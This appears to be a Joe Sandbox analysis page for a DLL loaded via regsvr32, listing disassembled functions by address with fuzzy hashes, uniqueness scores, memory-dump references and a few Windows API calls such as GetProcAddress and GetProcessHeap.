Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0
API String ID: 3215553584-4108050209
Opcode ID: 2257af8bb78518c90c99f5aa40edd27ee38284e92282c9c81efd08d27187f4eb
Instruction ID: f4eaffed5613f07dc65119eb5fd22f22692010c21965ba928573fafccfb8307a
Opcode Fuzzy Hash: 2257af8bb78518c90c99f5aa40edd27ee38284e92282c9c81efd08d27187f4eb
Instruction Fuzzy Hash: 2F61D391A0C24246EA64CAA99000BB95799BB41744FDC113DDCCBBF6A9CEADF84AC741

Uniqueness

Uniqueness Score: 0.03%

Function 00007FF983DD9B80, Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF983DD9B84

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 5e1e4bb0f0b2f6dfdef5c1ec2e78eda0e9ad3e05f996ff3bd65050bc608e073d
Instruction ID: 6af622ccaa5d961ec7f8b90d7b82104c36ac12aea43c01b0b24805cbc1e51c1d
Opcode Fuzzy Hash: 5e1e4bb0f0b2f6dfdef5c1ec2e78eda0e9ad3e05f996ff3bd65050bc608e073d
Instruction Fuzzy Hash: 5FB04864E06A06D2AA09AF616882B2822A4BB48711B8D0038C04DA0320DE6C20A99710

Uniqueness

Uniqueness Score: 0.04%

Function 00007FF983DCCEAC, Relevance: .5, Instructions: 535COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6173420ede10ff6efbe921fa0176f33509d067a66c0df4ca7d27c4e7449003a3
Instruction ID: 21f49cf1066550f233b9f1a025d9796051912e0233f176c2dbca90aaec733abb
Opcode Fuzzy Hash: 6173420ede10ff6efbe921fa0176f33509d067a66c0df4ca7d27c4e7449003a3
Instruction Fuzzy Hash: BE4273A1D2DE4784E253CBB59811B356B24BF52380F87933AE80FB6651DFACF55AC600

Uniqueness

Uniqueness Score: 0.00%

Function 00007FF983D9AB80, Relevance: .4, Instructions: 377COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b98a2c773692cf639131850ba5b69bb18f7f098f2f48057aa76cc7cd74c70fe
Instruction ID: de4f13de43da49f50a0f152a4b281143dc0b7db3f9ffeff7fbfc591a9f7f33ab
Opcode Fuzzy Hash: 2b98a2c773692cf639131850ba5b69bb18f7f098f2f48057aa76cc7cd74c70fe
Instruction Fuzzy Hash: 85E11993B0498286E39C8759CA5673D36E2FB94341F9AC03BEE4ADA798F93CD444C301

Uniqueness

Uniqueness Score: 0.00%

Function 00007FF983DB4750, Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: File$CloseHandleView$CreateMappingUnmapWrite
String ID:
API String ID: 2825254369-0
Opcode ID: 0940a7758f65e4b82048ce8da26de0430a3479ea129dd08e2dac05fff6392f98
Instruction ID: cd777e9618d1c8bb7798e4672870d5a2e6acf5963d8f4bb1720fead505f10c1e
Opcode Fuzzy Hash: 0940a7758f65e4b82048ce8da26de0430a3479ea129dd08e2dac05fff6392f98
Instruction Fuzzy Hash: 4AE12792B181B589FB05D6B684107FC2B316712F8CF880815DD566FB8BDAEEE309C761

Uniqueness

Uniqueness Score: 0.00%

Function 00007FF983DC6260, Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b83f53bb26f40cb8457967346dc09ae2c64d3fd2bceaf58f71d9a9fe766d9d3a
Instruction ID: 1518f19141c59ff4cd3bac5187241cd5adbfadfd813b86a519627f8de3b53d9a
Opcode Fuzzy Hash: b83f53bb26f40cb8457967346dc09ae2c64d3fd2bceaf58f71d9a9fe766d9d3a
Instruction Fuzzy Hash: 2C9105A2B3C14246EA29CEB59010BB92690BF50754F9C123DDA6BE77C5DDACF40FD600

Uniqueness

Uniqueness Score: 0.00%

Function 00007FF983DAAF60, Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68ca95d3d1974c7bbcf6cbcf847bb496cd3f53e2f8716573e572d08246ae4024
Instruction ID: 982774795be38fe97431379f562ee1274cfde71da82418b0a71373b5b28e34c3
Opcode Fuzzy Hash: 68ca95d3d1974c7bbcf6cbcf847bb496cd3f53e2f8716573e572d08246ae4024
Instruction Fuzzy Hash: 8EB118B3B192C54AC704CF789400ABD7BA1F75AB48B4C413ADE8ED774AC92CE60AC750

Uniqueness

Uniqueness Score: 0.00%

Function 00007FF983D9A860, Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65cfb915bb10e58a7e6474d5265362da27308c6e97c2f9a1a521d71be33d78a3
Instruction ID: c509cc941a55c8a389226b65bc171b4844baeefeed462b764cb6688367682e13
Opcode Fuzzy Hash: 65cfb915bb10e58a7e6474d5265362da27308c6e97c2f9a1a521d71be33d78a3
Instruction Fuzzy Hash: 61819487A094D147E3AC8159865673D6AD3BFE0600F99C03FFE46AD6C9E4BCEC48D242

Uniqueness

Uniqueness Score: 0.00%

Function 00007FF983DB1160, Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c00d2bfa4dde16540d4a302e8cec21300b8c2ccf1d6be99b8b5535cb92223fe7
Instruction ID: 4ff5986dbf72d110ae76aa94d8daf87a3909b08a06547c08cfc2d6a496985804
Opcode Fuzzy Hash: c00d2bfa4dde16540d4a302e8cec21300b8c2ccf1d6be99b8b5535cb92223fe7
Instruction Fuzzy Hash: 43715CB3A15BD186D310CF21E948FED33A8F39934CF866229DE9843A55DF74A1A5D700

Uniqueness

Uniqueness Score: 0.00%

Function 00007FF983DD06F0, Relevance: .1, Instructions: 126COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: a32a4509cc01343f6624d56551bf29a204b5bdace136aad5ad6c743c541d4cab
Instruction ID: 96d68635fa6e966451ce5a6557257a96f5b5cd059c80231d5daa39f193461f66
Opcode Fuzzy Hash: a32a4509cc01343f6624d56551bf29a204b5bdace136aad5ad6c743c541d4cab
Instruction Fuzzy Hash: 4F41B462B14A5442EB04CE6AEA147A97391B748FD4B49903ADE0EE7B55DF7CE045C700

Uniqueness

Uniqueness Score: 0.00%

Function 00007FF983DB4EF0, Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b53deb9b326550e1ae9d237c41ce3acb1c9664bd76a452e97be22bd27abd01
Instruction ID: aec3fd1b173773e43bfa1b360ff93c6f3109e084809434a07163bb30b2d939a9
Opcode Fuzzy Hash: a4b53deb9b326550e1ae9d237c41ce3acb1c9664bd76a452e97be22bd27abd01
Instruction Fuzzy Hash: 2431C9727244F0479BACCA3A9C705793AD2E39E702B84913EEE9687784D53DD505CB20

Uniqueness

Uniqueness Score: 0.00%

Function 00007FF983DC8DD0, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c9d88f403361e01f38285ca8cf51143f86f5098289194aad908f815a59a3809
Instruction ID: 52bdd9893182e23ee5c68da371fea09336a911b986188174442933032e64c899
Opcode Fuzzy Hash: 0c9d88f403361e01f38285ca8cf51143f86f5098289194aad908f815a59a3809
Instruction Fuzzy Hash: 373148A2E3C10285F6A5D5F9C504F7A124ABF81740EECC439C50BA1B99CDAFB84FD602

Uniqueness

Uniqueness Score: 0.00%

Function 00007FF983DC8CB0, Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54ff7f6cc40f6573ef0bc3d156123290f582f22433635047970340876ea546e7
Instruction ID: 13e778255e35beb4156859f446da214ad4fef10c0bb4cdd99bfc94e32c66d2fd
Opcode Fuzzy Hash: 54ff7f6cc40f6573ef0bc3d156123290f582f22433635047970340876ea546e7
Instruction Fuzzy Hash: DA3150A3E3C14249F6A5C5B9C564F791252BFA1340EACC439D10FA2B99CDADB84FD701

Uniqueness

Uniqueness Score: 0.00%

Function 00007FF983D98320, Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ff7df8b1ddb11b189353315002553438b8f9567d2e1ff1561c95ca71f075b67
Instruction ID: 93f34f0afc0675fe7f7eb4203f7eb0ada1b14f4a309307537f112bf006c8a61e
Opcode Fuzzy Hash: 8ff7df8b1ddb11b189353315002553438b8f9567d2e1ff1561c95ca71f075b67
Instruction Fuzzy Hash: F02175B2B20D494BDB5CC93D84523AE26C797E8728F84C5396E4BC33C9DC75CC928645

Uniqueness

Uniqueness Score: 0.00%

Function 00007FF983DE3028, Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47f05ff30cf6eb39d773e8df6358173213e473f9b2e52eb0a7c3e6c8dd7b4964
Instruction ID: c711c1d0c613bd5515530da350c8e4ca5ed94543b773b7c70c0b64e085de40df
Opcode Fuzzy Hash: 47f05ff30cf6eb39d773e8df6358173213e473f9b2e52eb0a7c3e6c8dd7b4964
Instruction Fuzzy Hash: 8F111D93C0D6C24AE7A3CF7848256792F60BB52E05B8E41BEC289E75D7D88DB918C605

Uniqueness

Uniqueness Score: 0.00%

Function 00007FF983DE3030, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d0e76a458e7e86889931c1b61db7d1b1b88de21c951ff1edfed88d6252016d7
Instruction ID: 9a67b0e8f661a07143caa821d15b509aabd2d8ab841d64e1bbfbc9fc581311b8
Opcode Fuzzy Hash: 8d0e76a458e7e86889931c1b61db7d1b1b88de21c951ff1edfed88d6252016d7
Instruction Fuzzy Hash: BE11CE9394D6C24AE7A3CF7848256782F60AB52E0578E41BEC2C9E71D7D88EB918C201

Uniqueness

Uniqueness Score: 0.00%

Function 00007FF983DD79B0, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ba3cc9dbf3b82e5dcc65de195548ebb1ec61654d45191e665b74e3eb1c478ec
Instruction ID: 03ffbf90b2178fd3bfb34f3914d81802d755c16ceb986fd946015065aa9df27f
Opcode Fuzzy Hash: 0ba3cc9dbf3b82e5dcc65de195548ebb1ec61654d45191e665b74e3eb1c478ec
Instruction Fuzzy Hash: E0F04FB1A192959BEBA5CF28B852B297790F708384B94803DD68DD3B04D67CA061CF04

Uniqueness

Uniqueness Score: 0.00%

Function 00007FF983DE31F8, Relevance: .0, Instructions: 7COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ff4330b36aff1a69d14fbeab58c7ec95cb26ed8bcf90d48fbfbf92d974ea576
Instruction ID: 1ecec1d21ecf48004efffa603c1f64d935dfaac1bbe24ebc09643c72be018d9e
Opcode Fuzzy Hash: 5ff4330b36aff1a69d14fbeab58c7ec95cb26ed8bcf90d48fbfbf92d974ea576
Instruction Fuzzy Hash: 77C08C63C8C8C38AC3A1CE3044A1BB22FE0EF12604B480078C1849B046C888B4188301

Uniqueness

Uniqueness Score: 0.00%

Function 00007FF983DE3280, Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70b98fd80eff30161be0de585c47960d68e1db4de27e21936376fdb8e8dc8e2d
Instruction ID: c6a3dc9f08f2e5f542d55ffbdbd9038bce26f3c3306d82f4439e2653d76fa616
Opcode Fuzzy Hash: 70b98fd80eff30161be0de585c47960d68e1db4de27e21936376fdb8e8dc8e2d
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: 0.00%

Function 00007FF983DE3248, Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b12e7abc5248dfae98b7a15744594f2f3936a1afe8a61d66670582f0ff56e4e
Instruction ID: 0219d59f0d01346e703c42b1cbde15efaacbf6a5e45960a17d20046431c36095
Opcode Fuzzy Hash: 5b12e7abc5248dfae98b7a15744594f2f3936a1afe8a61d66670582f0ff56e4e
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: 0.00%

Function 00007FF983DE3188, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cdd0b053bcc22954df321bc98f57924f2cff0ca9e89a1d11b6e2833c4481067
Instruction ID: ae2802040534d34daf8f1f4707f0066bea24c9b6d75ed02a837e3ce9ef37a814
Opcode Fuzzy Hash: 6cdd0b053bcc22954df321bc98f57924f2cff0ca9e89a1d11b6e2833c4481067
Instruction Fuzzy Hash: B990026250D2D78FD3229E7444141993B109701504B054471C35485445D9987264DB01

Uniqueness

Uniqueness Score: 0.00%

Function 00007FF983DB8EF8, Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 169libraryloaderUNIQUE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF983DB8F05
GetProcAddress.KERNEL32 ref: 00007FF983DB8F18
GetProcAddress.KERNEL32 ref: 00007FF983DB8F2F
GetProcAddress.KERNEL32 ref: 00007FF983DB8F46
GetProcAddress.KERNEL32 ref: 00007FF983DB8F5D
GetProcAddress.KERNEL32 ref: 00007FF983DB8F74
GetProcAddress.KERNEL32 ref: 00007FF983DB8F8B
GetProcAddress.KERNEL32 ref: 00007FF983DB8FA2
GetProcAddress.KERNEL32 ref: 00007FF983DB8FB9
GetProcAddress.KERNEL32 ref: 00007FF983DB8FD0
GetProcAddress.KERNEL32 ref: 00007FF983DB8FE7
GetProcAddress.KERNEL32 ref: 00007FF983DB8FFE
GetProcAddress.KERNEL32 ref: 00007FF983DB9015
GetProcAddress.KERNEL32 ref: 00007FF983DB902C
GetProcAddress.KERNEL32 ref: 00007FF983DB9043
GetProcAddress.KERNEL32 ref: 00007FF983DB905A
GetProcAddress.KERNEL32 ref: 00007FF983DB9071
GetProcAddress.KERNEL32 ref: 00007FF983DB9088
GetProcAddress.KERNEL32 ref: 00007FF983DB909F
GetProcAddress.KERNEL32 ref: 00007FF983DB90B6
GetProcAddress.KERNEL32 ref: 00007FF983DB90CD
GetProcAddress.KERNEL32 ref: 00007FF983DB90E4
GetProcAddress.KERNEL32 ref: 00007FF983DB90FB
GetProcAddress.KERNEL32 ref: 00007FF983DB9112
GetProcAddress.KERNEL32 ref: 00007FF983DB9129
GetProcAddress.KERNEL32 ref: 00007FF983DB9140
GetProcAddress.KERNEL32 ref: 00007FF983DB9157
GetProcAddress.KERNEL32 ref: 00007FF983DB916E
GetProcAddress.KERNEL32 ref: 00007FF983DB9185
GetProcAddress.KERNEL32 ref: 00007FF983DB919C
GetProcAddress.KERNEL32 ref: 00007FF983DB91B3
GetProcAddress.KERNEL32 ref: 00007FF983DB91CA
GetProcAddress.KERNEL32 ref: 00007FF983DB91E1
GetProcAddress.KERNEL32 ref: 00007FF983DB91F8
GetProcAddress.KERNEL32 ref: 00007FF983DB920F
GetProcAddress.KERNEL32 ref: 00007FF983DB9226
GetProcAddress.KERNEL32 ref: 00007FF983DB923D
GetProcAddress.KERNEL32 ref: 00007FF983DB9254
GetProcAddress.KERNEL32 ref: 00007FF983DB926B
GetProcAddress.KERNEL32 ref: 00007FF983DB9282
GetProcAddress.KERNEL32 ref: 00007FF983DB9299

Strings

FlsSetValue, xrefs: 00007FF983DB8F4C
